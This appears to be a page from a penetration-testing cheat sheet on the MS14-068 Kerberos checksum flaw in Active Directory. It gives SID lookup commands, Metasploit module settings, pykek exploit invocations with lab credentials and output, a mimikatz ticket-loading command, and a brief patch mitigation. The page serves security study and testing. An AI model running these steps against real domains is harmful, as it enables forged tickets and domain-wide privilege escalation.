InternalAllTheThings/docs/active-directory/CVE/MS14-068.md

3.8 KiB

MS14-068 Checksum Validation

This exploit require to know the user SID, you can use rpcclient to remotely get it or wmi if you have an access on the machine.

  • RPCClient
    rpcclient $> lookupnames john.smith
    john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
    
  • WMI
    wmic useraccount get name,sid
    Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
    Guest          S-1-5-21-3415849876-833628785-5197346142-501   
    Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
    Guest          S-1-5-21-297520375-2634728305-5197346142-501   
    krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
    lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
    
  • Powerview
    Convert-NameToSid high-sec-corp.localkrbtgt
    S-1-5-21-2941561648-383941485-1389968811-502
    
  • netexec: netexec ldap DC1.lab.local -u username -p password -k --get-sid
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068

Generate a ticket with metasploit or pykek

Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD  P@ssw0rd                                       yes       The Domain User password
   RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
   RPORT     88                                             yes       The target port
   Timeout   10                                             yes       The TCP timeout to establish connection and read data
   USER      lambda                                         yes       The Domain User
   USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
$ git clone https://github.com/SecWiki/windows-kernel-exploits
$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
-1105
  [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
  [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!

Then use mimikatz to load the ticket.

mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"

Mitigations

  • Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780

References